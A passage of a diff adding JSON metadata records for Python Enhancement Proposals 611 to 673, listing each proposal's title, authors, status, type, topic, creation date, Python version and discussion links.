"created": "05-Dec-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0611/" + }, + "612": { + "number": 612, + "title": "Parameter Specification Variables", + "authors": "Mark Mendoza", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "18-Dec-2019", + "python_version": "3.10", + "post_history": "18-Dec-2019, 13-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0612/" + }, + "613": { + "number": 613, + "title": "Explicit Type Aliases", + "authors": "Shannon Zhu", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/MWRJOBEEEMFVXE7CAKO7B4P46IPM4AN3/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "21-Jan-2020", + "python_version": "3.10", + "post_history": "21-Jan-2020", + 
"resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0613/" + }, + "614": { + "number": 614, + "title": "Relaxing Grammar Restrictions On Decorators", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2020", + "python_version": "3.9", + "post_history": "11-Feb-2020, 18-Feb-2020, 03-Mar-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VSR66MOTCDCY7ZFH4IG7QVFI2JXQQZQ5", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0614/" + }, + "615": { + "number": 615, + "title": "Support for the IANA Time Zone Database in the Standard Library", + "authors": "Paul Ganssle", + "discussions_to": "https://discuss.python.org/t/3468", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2020", + "python_version": "3.9", + "post_history": "25-Feb-2020, 29-Mar-2020", + "resolution": null, + "requires": null, + "replaces": "431", + "superseded_by": null, + "url": "https://peps.python.org/pep-0615/" + }, + "616": { + "number": 616, + "title": "String methods to remove prefixes and suffixes", + "authors": "Dennis Sweeney", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Mar-2020", + "python_version": "3.9", + "post_history": "20-Mar-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0616/" + }, + "617": { + "number": 617, + "title": "New PEG parser for CPython", + "authors": "Guido van Rossum, Pablo Galindo, Lysandros Nikolaou", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Mar-2020", + "python_version": "3.9", + "post_history": "02-Apr-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0617/" + }, + "618": { + "number": 618, + "title": "Add Optional Length-Checking To zip", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2020", + "python_version": "3.10", + "post_history": "01-May-2020, 10-May-2020, 16-Jun-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NLWB7FVJGMBBMCF4P3ZKUIE53JPDOWJ3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0618/" + }, + "619": { + "number": 619, + "title": "Python 3.10 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "25-May-2020", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0619/" + }, + "620": { + "number": 620, + "title": "Hide implementation details from the C API", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2020", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0620/" + }, + "621": { + "number": 621, + "title": "Storing project 
metadata in pyproject.toml", + "authors": "Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, S\u00e9bastien Eustace, Thomas Kluyver, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/pep-621-round-3/5472", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Jun-2020", + "python_version": null, + "post_history": "22-Jun-2020, 18-Oct-2020, 24-Oct-2020, 31-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-621-round-3/5472/109", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0621/" + }, + "622": { + "number": 622, + "title": "Structural Pattern Matching", + "authors": "Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin", + "discussions_to": "python-dev@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "23-Jun-2020", + "python_version": "3.10", + "post_history": "23-Jun-2020, 08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "634", + "url": "https://peps.python.org/pep-0622/" + }, + "623": { + "number": 623, + "title": "Remove wstr from Unicode", + "authors": "Inada Naoki", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/BO2TQHSXWL2RJMINWQQRBF5LANDDJNHH/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2020", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VQKDIZLZ6HF2MLTNCUFURK2IFTXVQEYA/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0623/" + }, + "624": { + "number": 624, + "title": "Remove Py_UNICODE encoder APIs", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jul-2020", + "python_version": "3.11", + "post_history": "08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0624/" + }, + "625": { + "number": 625, + "title": "Filename of a Source Distribution", + "authors": "Tzu-ping Chung, Paul Moore", + "discussions_to": "https://discuss.python.org/t/draft-pep-file-name-of-a-source-distribution/4686", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2020", + "python_version": null, + "post_history": "08-Jul-2020", + "resolution": "https://discuss.python.org/t/pep-625-file-name-of-a-source-distribution/4686/159", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0625/" + }, + "626": { + "number": 626, + "title": "Precise line numbers for debugging and other tools.", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2020", + "python_version": "3.10", + "post_history": "17-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0626/" + }, + "627": { + "number": 627, + "title": "Recording installed projects", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-627/4126", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Jul-2020", + "python_version": null, + "post_history": null, + "resolution": 
"https://discuss.python.org/t/pep-627/4126/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0627/" + }, + "628": { + "number": 628, + "title": "Add ``math.tau``", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2011", + "python_version": "3.6", + "post_history": "28-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0628/" + }, + "629": { + "number": 629, + "title": "Versioning PyPI's Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-629-versioning-pypis-simple-api/4720", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0629/" + }, + "630": { + "number": 630, + "title": "Isolating Extension Modules", + "authors": "Petr Viktorin", + "discussions_to": "capi-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0630/" + }, + "631": { + "number": 631, + "title": "Dependency specification in pyproject.toml based on PEP 508", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/5018", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Aug-2020", + "python_version": null, + "post_history": "20-Aug-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": "621", + "url": "https://peps.python.org/pep-0631/" + }, + "632": { + "number": 632, + "title": "Deprecate distutils module", + "authors": "Steve Dower", + "discussions_to": "https://discuss.python.org/t/pep-632-deprecate-distutils-module/5134", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2020", + "python_version": "3.10", + "post_history": "03-Sep-2020, 22-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/TXU6TVOMBLQU3SV57DMMOA5Y2E67AW7P/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0632/" + }, + "633": { + "number": 633, + "title": "Dependency specification in pyproject.toml using an exploded TOML table", + "authors": "Laurie Opperman, Arun Babu Neelicattu", + "discussions_to": "https://discuss.python.org/t/dependency-specification-in-pyproject-toml-using-an-exploded-toml-table/5123/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "02-Sep-2020", + "python_version": null, + "post_history": "02-Sep-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0633/" + }, + "634": { + "number": 634, + "title": "Structural Pattern Matching: Specification", + "authors": "Brandt Bucher, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": 
"Final", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": "622", + "superseded_by": null, + "url": "https://peps.python.org/pep-0634/" + }, + "635": { + "number": 635, + "title": "Structural Pattern Matching: Motivation and Rationale", + "authors": "Tobias Kohn, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0635/" + }, + "636": { + "number": 636, + "title": "Structural Pattern Matching: Tutorial", + "authors": "Daniel F Moisset", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0636/" + }, + "637": { + "number": 637, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2020", + "python_version": "3.10", + "post_history": "23-Sep-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6TAQ2BEVSJNV4JM2RJYSSYFJUT3INGZD/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0637/" + }, + "638": { + "number": 638, + "title": "Syntactic Macros", + "authors": "Mark Shannon", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/U4C4XHNRC4SHS3TPZWCTY4SN4QU3TT6V/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2020", + "python_version": null, + "post_history": "26-Sep-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0638/" + }, + "639": { + "number": 639, + "title": "Improving License Clarity with Better Package Metadata", + "authors": "Philippe Ombredanne, C.A.M. 
Gerlach, Karolina Surma", + "discussions_to": "https://discuss.python.org/t/53020", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Aug-2019", + "python_version": null, + "post_history": "`15-Aug-2019 `__, `17-Dec-2021 `__, `10-May-2024 `__,", + "resolution": "https://discuss.python.org/t/53020/106", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0639/" + }, + "640": { + "number": 640, + "title": "Unused variable syntax", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Oct-2020", + "python_version": "3.10", + "post_history": "19-Oct-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0640/" + }, + "641": { + "number": 641, + "title": "Using an underscore in the version portion of Python 3.10 compatibility tags", + "authors": "Brett Cannon, Steve Dower, Barry Warsaw", + "discussions_to": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Oct-2020", + "python_version": "3.10", + "post_history": "21-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0641/" + }, + "642": { + "number": 642, + "title": "Explicit Pattern Syntax for Structural Pattern Matching", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2020", + "python_version": "3.10", + "post_history": "31-Oct-2020, 08-Nov-2020, 03-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": "634", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0642/" + }, + "643": { + "number": 643, + "title": "Metadata for Package Source Distributions", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2020", + "python_version": null, + "post_history": "24-Oct-2020, 01-Nov-2020, 02-Nov-2020, 14-Nov-2020", + "resolution": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577/53", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0643/" + }, + "644": { + "number": 644, + "title": "Require OpenSSL 1.1.1 or newer", + "authors": "Christian Heimes", + "discussions_to": "https://discuss.python.org/t/pep-644-require-openssl-1-1-or-newer/5584", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2020", + "python_version": "3.10", + "post_history": "27-Oct-2020, 03-Mar-2021, 17-Mar-2021, 17-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/INLCO2EZVQW7R7J2OL6HWVLVU3TQRAZV/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0644/" + }, + "645": { + "number": 645, + "title": "Allow writing optional types as ``x?``", + "authors": "Maggie Moss", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/E75SPV6DDHLEEFSA5MBN5HUOQWDMUQJ2/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0645/" + }, + "646": { + "number": 646, + "title": "Variadic Generics", + "authors": "Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "16-Sep-2020", + "python_version": "3.11", + "post_history": "07-Oct-2020, 23-Dec-2020, 29-Dec-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/OR5RKV7GAVSGLVH3JAGQ6OXFAXIP5XDX/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0646/" + }, + "647": { + "number": 647, + "title": "User-Defined Type Guards", + "authors": "Eric Traut", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Oct-2020", + "python_version": "3.10", + "post_history": "28-Dec-2020, 09-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2ME6F6YUVKHOQYKSHTVQQU5WD4CVAZU4/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0647/" + }, + "648": { + "number": 648, + "title": "Extensible customizations of the interpreter at startup", + "authors": "Mario Corchero", + "discussions_to": "https://discuss.python.org/t/pep-648-extensible-customizations-of-the-interpreter-at-startup/6403", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Dec-2020", + "python_version": "3.11", + "post_history": "16-Dec-2020, 18-Dec-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0648/" + }, + "649": { + "number": 649, + "title": "Deferred Evaluation Of Annotations Using Descriptors", + "authors": "Larry Hastings", + "discussions_to": "https://discuss.python.org/t/pep-649-deferred-evaluation-of-annotations-tentatively-accepted/21331/", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "11-Jan-2021", + "python_version": "3.14", + "post_history": "`11-Jan-2021 `__, `12-Apr-2021 `__, `18-Apr-2021 `__, `09-Aug-2021 `__, `20-Oct-2021 `__, `20-Oct-2021 `__, `17-Nov-2021 `__, `15-Mar-2022 `__, `23-Nov-2022 `__, `07-Feb-2023 `__, `11-Apr-2023 `__,", + "resolution": "`08-May-2023 `__", + "requires": null, + "replaces": "563", + "superseded_by": null, + "url": "https://peps.python.org/pep-0649/" + }, + "650": { + "number": 650, + "title": "Specifying Installer Requirements for Python Projects", + "authors": "Vikram Jayanthi, Dustin Ingram, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/pep-650-specifying-installer-requirements-for-python-projects/6657", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "14-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0650/" + }, + "651": { + "number": 651, + "title": "Robust Stack Overflow Handling", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2021", + "python_version": null, + "post_history": "19-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0651/" + }, + "652": { + "number": 652, + "title": "Maintaining the Stable ABI", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pre-pep-maintaining-the-stable-abi/6986/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/IN4XMFLQJ6D6V67EXU27GV3QWSEHHNNH/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0652/" + }, + "653": { + "number": 653, + "title": "Precise Semantics for Pattern Matching", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": null, + "post_history": "18-Feb-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0653/" + }, + "654": { + "number": 654, + "title": "Exception Groups and except*", + "authors": "Irit Katriel, Yury Selivanov, Guido van Rossum", + "discussions_to": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2021", + "python_version": "3.11", + "post_history": "`22-Feb-2021 `__, `20-Mar-2021 `__, `03-Oct-2021 `__,", + "resolution": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813/1", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0654/" + }, + "655": { + "number": 655, + "title": "Marking individual TypedDict items as required or potentially-missing", + "authors": "David Foster", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/53XVOD5ZUKJ263MWA6AUPEA6J7LBBLNV/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Jan-2021", + "python_version": "3.11", + "post_history": "31-Jan-2021, 11-Feb-2021, 20-Feb-2021, 26-Feb-2021, 17-Jan-2022, 28-Jan-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/AJEDNVC3FXM5QXNNW5CR4UCT4KI5XVUE/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0655/" + }, + "656": { + "number": 656, + "title": "Platform Tag for Linux Distributions Using Musl", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/7165", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Mar-2021", + "python_version": null, + "post_history": "17-Mar-2021, 18-Apr-2021", + "resolution": "https://discuss.python.org/t/7165/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0656/" + }, + "657": { + "number": 657, + "title": "Include Fine Grained Error Locations in Tracebacks", + "authors": "Pablo Galindo, Batuhan Taskaya, Ammar Askar", + "discussions_to": 
"https://discuss.python.org/t/pep-657-include-fine-grained-error-locations-in-tracebacks/8629", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-May-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0657/" + }, + "658": { + "number": 658, + "title": "Serve Distribution Metadata in the Simple Repository API", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/8651", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2021", + "python_version": null, + "post_history": "10-May-2021", + "resolution": "https://discuss.python.org/t/8651/48", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0658/" + }, + "659": { + "number": 659, + "title": "Specializing Adaptive Interpreter", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "13-Apr-2021", + "python_version": null, + "post_history": "11-May-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0659/" + }, + "660": { + "number": 660, + "title": "Editable installs for pyproject.toml based builds (wheel based)", + "authors": "Daniel Holth, St\u00e9phane Bidoul", + "discussions_to": "https://discuss.python.org/t/draft-pep-editable-installs-for-pep-517-style-build-backends/8510", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Mar-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0660/" + }, + "661": { + "number": 661, + "title": "Sentinel Values", + "authors": "Tal Einat", + "discussions_to": "https://discuss.python.org/t/pep-661-sentinel-values/9126", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2021", + "python_version": null, + "post_history": "`20-May-2021 `__, `06-Jun-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0661/" + }, + "662": { + "number": 662, + "title": "Editable installs via virtual wheels", + "authors": "Bern\u00e1t G\u00e1bor", + "discussions_to": "https://discuss.python.org/t/discuss-tbd-editable-installs-by-gaborbernat/9071", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "28-May-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0662/" + }, + "663": { + "number": 663, + "title": "Standardizing Enum str(), repr(), and format() behaviors", + "authors": "Ethan Furman", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "30-Jun-2021", + "python_version": "3.11", + "post_history": "20-Jul-2021, 02-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/RN3WCRZSTQR55DOHJTZ2KIO6CZPJPCU7/", + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0663/" + }, + "664": { + "number": 664, + "title": "Python 3.11 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0664/" + }, + "665": { + "number": 665, + "title": "A file format to list Python dependencies for reproducibility of an application", + "authors": "Brett Cannon, Pradyun Gedam, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/9911", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Jul-2021", + "python_version": null, + "post_history": "29-Jul-2021, 03-Nov-2021, 25-Nov-2021", + "resolution": "https://discuss.python.org/t/pep-665-take-2-a-file-format-to-list-python-dependencies-for-reproducibility-of-an-application/11736/140", + "requires": null, + "replaces": null, + "superseded_by": "751", + "url": "https://peps.python.org/pep-0665/" + }, + "666": { + "number": 666, + "title": "Reject Foolish Indentation", + "authors": "Laura Creighton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "03-Dec-2001", + "python_version": "2.2", + "post_history": "05-Dec-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0666/" + }, + "667": { + "number": 667, + "title": "Consistent views of namespaces", + "authors": "Mark Shannon, Tian Gao", + "discussions_to": "https://discuss.python.org/t/46631", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2021", + "python_version": "3.13", + "post_history": "20-Aug-2021, 22-Feb-2024", + "resolution": "`25-Apr-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0667/" + }, + "668": { + "number": 668, + "title": "Marking Python base environments as \u201cexternally managed\u201d", + "authors": "Geoffrey Thomas, Matthias Klose, Filipe La\u00edns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/10302", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "18-May-2021", + "python_version": null, + "post_history": "28-May-2021", + "resolution": "https://discuss.python.org/t/10302/44", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0668/" + }, + "669": { + "number": 669, + "title": "Low Impact Monitoring for CPython", + "authors": "Mark Shannon", + "discussions_to": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2021", + "python_version": "3.12", + "post_history": "`07-Dec-2021 `__, `10-Jan-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0669/" + }, + "670": { + "number": 670, + "title": "Convert macros to functions in the Python C API", + "authors": "Erlend Egeberg Aasland, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": 
"Standards Track", + "topic": "", + "created": "19-Oct-2021", + "python_version": "3.11", + "post_history": "`20-Oct-2021 `__, `08-Feb-2022 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/QQFCJ7LR36RUZSC3WI6WZZMQVQ3ZI4MS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0670/" + }, + "671": { + "number": 671, + "title": "Syntax for late-bound function argument defaults", + "authors": "Chris Angelico", + "discussions_to": "https://mail.python.org/archives/list/python-ideas@python.org/thread/UVOQEK7IRFSCBOH734T5GFJOEJXFCR6A/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Oct-2021", + "python_version": "3.12", + "post_history": "`24-Oct-2021 `__, `01-Dec-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0671/" + }, + "672": { + "number": 672, + "title": "Unicode-related Security Considerations for Python", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "01-Nov-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0672/" + }, + "673": { + "number": 673, + "title": "Self Type", + "authors": "Pradeep Kumar Srinivasan, James Hilton-Balfe", + "discussions_to": 